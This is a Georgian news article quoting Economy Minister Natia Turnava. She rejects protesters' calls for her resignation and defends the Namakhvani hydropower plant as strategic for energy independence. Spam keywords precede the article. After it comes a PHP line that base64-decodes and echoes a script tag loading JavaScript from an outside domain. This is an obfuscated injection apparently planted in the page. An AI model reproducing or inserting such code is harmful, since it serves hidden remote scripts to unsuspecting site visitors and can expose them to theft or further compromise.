gorgia
ავერსი jaluzi

როგორც ეკონომიკის მინისტრმა ნათია თურნავამ განაცხადა, რომ ეპარებოდეს ეჭვი ნამახვანჰესის სტრატეგიულ მნიშვნელობაში, მაშინ ერთი წამით არ იქნებოდა იქ სადაც არის და ამისთვის, დამატებით მოწოდებები არ გახდებოდა საჭირო. ეს განცხადება თურნავამ მედიასთან, პროტესტანტების მიერ მისი გადადგომის მოთხოვნაზე საპასუხო კომენტარისას გააკეთს. 

"მე ერთი წამითაც ეჭვი რომ მეპარებოდეს და არ ვიყო დარწმუნებული იმაში, რომ ქვეყნის დამოუკიდებლობა გადის ენერგოდამოუკიდებლობაზე და ეს პროექტი, ისევე, როგორც სხვა ადგილობრივი გენერაციის პროექტები, ძალიან სტრატეგიულია ჩვენთვის, თქვენ წინაშე არ ვიდგებოდი და არანაირი დამატებით მოწოდება არ დამჭირდებოდა. მაგრამ დარწმუნებული ვართ რა, რომ ერთად უნდა ვაშენოთ ძლიერი ენერგეტიკული სისტემა, ისეთი სისტემა, რომელიც იქნება დამოუკიდებელი და ჩვენი დამოუკიდებელი ეკონომიკისა და სუვერენიტეტის განმტკიცების საფუძველი, რომ ნამახვანჰესი, როგორც ერთ-ერთი თვალსაჩინო, კარგად მოკვლეული, სრულყოფილი პროექტი იქნება ამ სისტემის ერთ-ერთი მნიშვნელოვანი შენატანი, ამიტომაც ვაგრძელებთ მუშაობას", — განაცხადა თურნავამ.  
 
შეგახსენებთ , რომ ნამახვანჰესის მშენებლობის მოწინააღმდეგეები 23 მაისიდან თბილისში საპროტესტო აქციებს მართავენ. დემონსტრანტთა ნაწილი რეგიონებიდან ჩამოვიდა. აქტივისტების ნაწილმა რესპუბლიკის მოედანზე კარვები გაშალა. 
 
 
2486
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");